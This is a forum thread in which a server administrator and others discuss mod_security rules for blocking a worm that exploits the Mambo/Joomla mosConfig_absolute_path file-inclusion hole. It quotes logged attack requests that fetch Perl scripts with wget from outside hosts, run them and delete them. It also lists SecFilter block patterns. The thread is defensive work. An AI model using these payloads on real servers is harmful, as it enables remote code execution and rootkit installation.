need help with mod-security to prevent atttacks from specific websites.

[neonix]

Hi,

Mod-security is blocking a wave of attacks from different I.P's trying to download malicious files from www.thriftysix.co.uk, www.freewebs.com and www.sporadical.org.

Blocking I.P's do not work as the attackers keep on changing I.P's but the websites from where they are trying to download these tools remain the same. How do I blacklist these websites completely...I have a RHEL/cpanel server. Thanks for your help and advise.

202.133.209.67 2006-02-11 05:48:42 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0 www.xxx.net Access denied with code 406. Pattern match "wget " at THE_REQUEST 406

220.245.178.132 2006-02-11 05:46:47 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0 www.xxxx.net Access denied with code 406. Pattern match "Mozilla/(4|5)\\.0$" at HEADER("USER-AGENT") 406

202.133.209.67 2006-02-11 05:44:37 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sporadical.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.sporadical.org/xxd.txt;perl%20xxd.txt;rm%20-rf%20xxd.txt*? HTTP/1.0

[rustelekom]

will be better if you just block wget, cd and other system commands.
BTW - you may just download newest mod_security rules from official modescurity.org site.

[HostMerit]

Block the type of attack.

SecFilter "mosConfig_absolute_path" would even do it.

Also, check around the forums for posts / threads by me with my rules, this one is in there long ago.

Unfortunately, since this is a worm and spreads itself using the servers it has infected, you can either ask your data center to drop traffic at the router for each IP, or sit it out, and empty your audit_log, once in a while

But the main thing about this attack that can be squashed, regardless of what the command they run is (What if it's not wget) is:

SecFilter "mosConfig_absolute_path"

[verdon]

...empty your audit_log, once in a while

I added my audit_log to logrotate... that helps

[neonix]

Kris,

The reason mod-security has been blocking these attacks; is that I have been using your rules

Do you have a 'rule' to blacklist some websites completely...to prevent any scripts being downloaded/run from there... as an added precaution.

Thanks for your help!

# Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
SecFilter "mosConfig_absolute_path"
SecFilterSelective THE_REQUEST "tool\.gif"
SecFilterSelective THE_REQUEST "tool25\.txt"
SecFilter "perl\x20xx\.txt"
SecFilter "sweet-serenity\.org"
SecFilterSelective THE_REQUEST "sess3025"
SecFilter "mosConfig_absolute_path=http"
SecFilter "echo\x20YYY"
SecFilter "cmd\.gif?"
SecFilter "\x20bash;"
SecFilter "200\.72\.130\.29"
SecFilter "200\.207\.91\.25"
SecFilter "62\.23\.221\.67"
SecFilter "147\.142\.142\.24"
SecFilter "62\.23\.221\.67 "
SeCFilter "202\.143\.140\.151"
SecFilterSelective THE_REQUEST "killop"
SecFilterSelective THE_REQUEST "\/bash;chmod"

[ShockHosts]

Just about the link... It is http://modsecurity.org just incase noone knew...

Find the attackers hostname (palmer.comcast.net) and try block that with iptables or something..

[HostMerit]

It's a rootkit that's spread, so if anything, you'd block the website it's accessing. Since it spreads rapidly no way of knowing the possible attacking IPs, but if they only use a pool of 5-6 websites (sporadical.org) etc it's easy to block them.

Glad to get some thanks for my security rules

This would even work, but haven't tried it as it (MIGHT) block some legimate items.

SecFilter "cmd=cd"